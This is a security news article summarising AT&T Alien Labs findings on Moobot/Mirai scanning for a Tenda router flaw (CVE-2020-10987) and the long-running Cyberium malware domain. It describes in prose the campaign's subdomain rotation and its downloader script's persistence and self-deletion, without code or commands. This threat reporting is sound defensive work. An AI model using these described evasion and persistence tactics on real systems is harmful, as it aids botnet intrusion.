Alien Labs saw a spike in the activity of the Mirai botnet Moobot that is looking for a flaw in Tenda routers. The scanning traced back to a new cyber-underground malware domain Cyberium, which has been observed in a large amount of Mirai-variant activity recently. However, the researchers couldn’t tell what threat actor was behind the scanning activity.
According to AT&T Alien Labs, the attackers were scanning for vulnerable Tenda routers that had a remote code-execution (RCE) issue (CVE-2020-10987).
“This spike was observed throughout a significant number of clients, in the space of a few hours,” according to an AT&T analysis, released Monday. “This vulnerability is not commonly used by web scanners and was barely detected by our honeypots during the last six months, except for a minor peak in November.”
The infrastructure behind Tenda scans was discovered in March, and it was used to scan for additional bugs.
It was also deploying a remote DVR scanner that tried to illegally install the Sofia video application.
The malware was deposited from the same domain as the compromised devices.
“When this domain was investigated, several campaigns were identified, going back at least one year to May 2020,” according to AT&T. “Most of the attacks lasted for approximately a week while they hosted several Mirai variants.”
The campaigns had their own subdomain page, which became unresolvable once it was completed.
The campaign would switch between different Mirai variants, with the same URL hosting both Satori and Moobot.
“The actors appear to come back to the same domain with a new subdomain for each new campaign,” researchers explained. “Activity in between campaigns goes quiet to increase the trust of the original domain. Keeping a long-running existing domain while issuing a brand-new subdomain helps to divert attention to the new domain and thus distract from the original.”
After initial unauthorized access to the targeted internet of things (IoT) device, the first request to Cyberium was for a bash script. This script is very similar to the downloaders that were used for Mirai variants, researchers said.
“The script attempts to download a list of filenames (associated with different CPU architectures), executes each one of them, achieves persistence through a crontab that redownloads the bash script itself and finally deletes itself,” according to the analysis.
Besides Mirai, attackers relied on Moobot, a bot that uses zero-day exploits to compromise various types of fiber routers and also Docker APIs, researchers noted. It tries to add devices to a botnet that carries out distributed denial of service attacks. It is similar to the Mirai campaign. The main differences between Moobot and other bots is a hardcoded string that is used several times in the code.
“The number of samples Alien Labs has seen with that string has greatly increased in the last months, scattering from the original Moobot sample,” AT&T noted. “This could potentially mean that last year’s Moobots samples were used to create new branches of Mirai variants. However, it did maintain other previously seen characteristics, like a hardcoded list of IP addresses to avoid, such as: Private ranges, the Department of Defense, IANA IPs, GE, HP and others,” according to the analysis.
AT&T has found that Cyberium is still active and has been for the past year or so.